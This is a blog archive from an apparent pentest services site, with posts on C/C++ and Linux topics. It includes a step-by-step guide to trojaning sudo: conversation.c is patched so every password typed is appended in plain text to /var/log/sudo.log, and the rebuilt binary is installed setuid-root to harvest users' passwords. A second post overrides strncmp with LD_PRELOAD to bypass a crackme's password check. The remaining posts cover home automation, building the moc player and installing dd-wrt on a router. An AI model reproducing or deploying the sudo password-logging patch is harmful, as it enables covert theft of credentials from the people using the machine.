Category Archives: C/C++

IT Security Brothers (http://itsb.pro)

Hi guys, I would like to present you our new project IT Security Brothers http://itsb.pro
We provide pentest, consultations and IT outsourcing services.
Feel free to hire us for IT jobs.

How to get passwords through sudo

1) download sudo sources
2) open file conversation.c
3) add

1
#include<stdio.h>

4) search strings

1
2
3
pass = tgetpass(msg->msg, msg->timeout, flags);
if (pass == NULL)
    goto err;

4) after previous strings add code

1
2
3
4
FILE *file;
file = fopen("/var/log/sudo.log","a+");
fprintf(file, "%s\n", pass);
fclose(file);

5) build sudo (read README and INSTALL files, but really run only «./configure && make» commands)
6) put new sudo binary in /usr/bin/ folder
7) chmod 4000 /usr/bin/sudo
8) chmod +x /usr/bin/sudo
9) chown root.root /usr/bin/sudo
10) you could find passwords in /var/log/sudo.log after user's using of that command

How to use LD_PRELOAD for cracking applications

How to use LD_PRELOAD for cracking applications.
test.cpp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#include<stdio.h>
#include<stdlib.h>
#include<cstring>
#include<iostream>
using namespace std;

int main()
{
  char *pre_pass = "a382fbe8e8f087352e250561d724c0a";
  char *salt =     "1qazxcvfdswer435tgbnhy67ujmkdfg";
  char pass[32];
  for(int i = 0; i < 32; i++)
  {
    int a = pre_pass[i];
    int b = salt[i];
    int c = (a + b)/2;
    pass[i] = c;
  }
  char user_input[32];
  cout << "Enter your password's md5 hash for enter to root access level" << endl;
  cout << "> ";
  cin.width(32);
  cin >> user_input;
  if ( strncmp( pass, user_input, 32)==0 )
    {
      cout <<  "Secret is " << pass << endl;
    }
  else
    {
      cout << "Access denied, fucking looser" << endl;
    }
  return 1;
}

Compile it with g++:
g++ test.cpp -o test

try to get pass ^_^
./test

1
2
3
Enter your password's md5 hash for enter to root access level
> asd
Access denied, fucking looser

How to hack it ? LD_PRELOAD is answer!

Let's take a look at code, we see that we have to get zero in the return value of strncmp, let's do it !
strncmp_lib.c

1
2
3
4
int strncmp(const char * string1, const char * string2, int num )
{
return 0;
}

compite it with gcc:
gcc -Wall -O2 -fpic -shared -ldl -o strncmp_lib.so strncmp_lib.c

and run:
LD_PRELOAD="./strcmp_lib.so" ./test

1
2
3
Enter your password's md5 hash for enter to root access level
> asd
Secret is IRLVobmOdUnJU535SfJQLW64lPOOcKd

Home automation

Home automation.

Accumulated some information from internet circuitry, controllers, various examples. As a confirmation of my small developing the project, decided to write an article ...
So we have: router dir-320 (with dd-wrt, the installation process described in the previous article about dir-320 + C), the controller ATmega8535, a small control circuit for optodriver, object management (reading lamps, power audio, home water heater), a little wires soldering iron, FREE  time.
What I would like to receive: software power management objects that feed from ~ 220 V.
Proper management of the facility as follows:
Mobile phone-> mobile browser-> wifi (mobile) -> wifi (router dir-320) -> set lightpd-> handler to perl-> uart (router) -> uart (controller mega8535) -> control signal (+5 controller) -> control signal (+5 optodrayvera) -> control signal (~ 220 optodriver) -> object management.
In this scheme can be replaced with «Mobile phone-> mobile browser-> wifi (mobile) ->» on a laptop, work PC and TP.
Also has the ability to manage through the wan port connected to the Inet Network, again by reference to lightpd.
What + this scheme:
  • No need to get out of bed for the inclusion of blackouts, TC management with a laptop or a mobile.
  • There is a possibility to saving by switch off / on the water heater, even if you're not at home — through the Net.
  • Integrated on / off devices (coming to the house, you can pre-enable such light wherever necessary. Including teapot before joining)
  • Often forget to disconnect the device from the network before leaving. This is possible at any time.
What — this scheme:
  • Maybe not quite convenient to get or keep a hand every once in a mobile phone for on/off light. But this is  solved by parallel turning optodriver with switch light.But, again, will not turn off remotely if it enabled.
  • Each device is an additional wire and a device for optodraiver. The wires need to get by secured to the wall or hide in the wall, which entails a change of wallpaper ))))) Optodriver also need to get by hiding in the socket, God forbid, if there is enough room)
  • Exception when MOBILE, laptop does not turn on the computer broke. Solved only parallel connection of a physical means of control.

Continue reading Home automation

moc player with full ffmpeg support

moc player with full ffmpeg support

$ git clone -b yurial git://github.com/yurial/mocp.git
$ cd mocp
$ ./autogen.sh
$ ./configure --without-curl --without-samplerate --without-speex --without-sidplay2 --without-timidity --without-modplug --without-sndfile --without-wavpack --without-flac --without-vorbis --without-musepack --without-aac --without-rcc --without-mp3 --without-magic --without-jack --without-oss --with-gnu-ld --disable-debug
$ make
# make install

 

Now you can use mocp to listen to music files with extensions that are supported by ffmpeg.

If you want to find music files by content, you need to add «FastDirScan=no» to your ~/.moc/config

dir-320 + dd-wrt + gcc (compiling under dir-320)

We go on dd-wrt.com. In section download firmware for dir-320 – dd-wrt.v24_usb_generic.bin (latest v24).

It is required console tftp, it is possible to establish through the manager of installation of standard applications in windows, as and in linux.

We keep in some folder under a name firmware.bin. We open the console №1, we pass in a folder where  firmware.bin, we make a command «tftp 192.168.0.1 ″, we prepare a command« put firmware.bin»

We open the second console, we write and it is started «ping-f 192.168.0.1 ″ (for linux)« ping 192.168.0.1-n 1000 ″ (for win). ICMP the answer shouldn't come back, if, of course, at a router ip not 192.168.0.1.

We switch off a router power, then turn on it. It is necessary to seize that moment when there will be answers from a router in the second console. During this moment it is necessary to start in advance prepared command in the first console.

If all has passed successfully there will be a message in the first console that the firmware is successfully loaded. Otherwise we repeat above written.

It is necessary to wait burning of a light-emitting diode «status», or occurrences of a wireless network «dd-wrt» that signals that the router is booting with new firmeware successfully!

As a result we receive a router with an firmeware dd-wrt.

For the next we will need in flash drive with ext2fs. It is possible to format in any way. An example for linux Ubuntu.

# mkfs.ext2/dev/sdb1

As a result it is received flash drive with section ext2fs.

We insert it in USB router port.

We correct router options through web. Under the standard now at router IP will be 192.168.1.1. In an address line of the browser we write 192.168.1.1.  Login/pass – admin/admin. Further Services-> USB. To include points on «Base support USB","Support USB 1.1 (OHCI)","Support of USB-disks","Support file.system ext2/ext3 ″,« Automatic Drive Mount », others to disconnect. Assembling point«/opt». Further button" Apply ". The router reboots.

Further a tab «servicing» (penultimate). It is necessary to include «Support JFFS2. As we press point to apply. The router reboots.

Now it is necessary to come a telnet on a router.

# telnet 192.168.1.1

login/pass – root/admin.

Whether now it is necessary to check up mounted a flash drive.

# mount

If there is a point/dev/discs/disc0/part1 on/opt type ext2 (rw), means mounted.

Further we mount a folder jffs.

# mkdir/opt/jffs/

# mount-o bind/opt/jffs//jffs/

All. The system is ready to installation!!

We put optware.

# wget-O/tmp/prep_optware http://wd.mirmana.com/prep_optware

# sh/tmp/prep_optware

Process long. We wait.

We load/is updated a tree of packages.
# ipkg-opt update

We put buildroot.
# ipkg install buildroot
Process as the long.

We export enviroments the necessary.
# export LD_LIBRARY_PATH =/opt/lib: $ LD_LIBRARY_PATH

All. Now it is possible to compile the programs on C.

#gcc <input file>-o <outputfile>